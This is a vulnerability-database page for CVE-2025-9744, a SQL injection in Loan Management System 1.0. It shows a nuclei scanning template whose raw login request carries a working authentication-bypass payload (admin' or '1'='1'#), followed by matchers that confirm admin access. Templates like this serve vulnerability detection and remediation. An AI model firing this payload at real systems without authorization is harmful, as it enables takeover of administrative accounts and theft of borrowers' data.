Lucene search
K

Loan Management System 1.0 - SQL Injection

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

SQL injection in Loan Management System 1.0 allows data theft, modification, and admin operations.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-9744
31 Aug 202522:44
circl
CNNVD
CampCodes Online Loan Management System 安全漏洞
31 Aug 202500:00
cnnvd
CVE
CVE-2025-9744
31 Aug 202520:02
cve
Cvelist
CVE-2025-9744 Campcodes Online Loan Management System ajax.php sql injection
31 Aug 202520:02
cvelist
GithubExploit
Exploit for Injection in Campcodes Online_Loan_Management_System
20 Oct 202520:48
githubexploit
EUVD
EUVD-2025-26307
3 Oct 202520:07
euvd
NVD
CVE-2025-9744
31 Aug 202520:15
nvd
OSV
CVE-2025-9744
31 Aug 202520:15
osv
Packet Storm
📄 Campcodes Online Loan Management System 1.0 SQL Injection
21 Oct 202500:00
packetstorm
Positive Technologies
PT-2025-35425
31 Aug 202500:00
ptsecurity
Rows per page
id: CVE-2025-9744

info:
  name: Loan Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Unauthenticated attackers can bypass authentication and gain full administrative access through SQL injection in the username parameter, potentially compromising the entire loan management system.
  remediation: |
    Upgrade Loan Management System to a patched version that properly sanitizes user input in authentication handling.
  reference:
    - https://www.exploit-db.com/exploits/50402
    - https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9744
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-9744
    epss-score: 0.01664
    epss-percentile: 0.7386
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,auth-bypass,cms,packetstorm,edb,loancms,sqli,vuln

http:
  - raw:
      - |
        POST /ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
      - |
        GET /index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'window.start_load'
          - 'Welcome back Admin'
          - 'Loan Management System'
        condition: and

      - type: word
        part: body
        words:
          - 'login-form'
        negative: true
# digest: 4a0a0047304502205252fc546e6c9b28c86ae4fabcfe805b4477509ec4a4aad9d4cc6d24c153c94a022100d0bfb6356d003d6d6cce972b2deb7476fe747d26ecfbd613bd48a766b464d97d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.01664
SSVC
11